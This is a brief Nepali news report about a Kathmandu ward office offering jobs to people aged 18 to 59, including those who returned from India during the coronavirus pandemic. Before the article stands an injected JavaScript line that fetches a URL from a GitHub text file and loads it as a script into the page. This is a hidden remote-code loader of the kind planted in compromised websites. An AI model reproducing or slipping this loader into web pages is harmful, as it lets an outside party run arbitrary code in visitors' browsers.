;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
मंसिर ०७,
काठमाडौं । काठमाडौंको गोकर्णश्वर नगरपालिका वडा नं ९ ले युवाहरुलाई रोजगारी दिने भएको छ ।
आइतबार एक सूचना जारी गर्दै वडाले १८ वर्षदेखि ५९ वर्ष उमेरका युवाहरको विवरण पठाउन आग्रह गरेको छ । कोरोना भाइरस संक्रमणका कारण भारत लगायतका देशबाट आएकाहरुलाई ध्यानमा राख्दै रोजगारी दिने वडा कार्यलयले जनाएको छ ।
फेसबुक प्रतिक्रियाहरु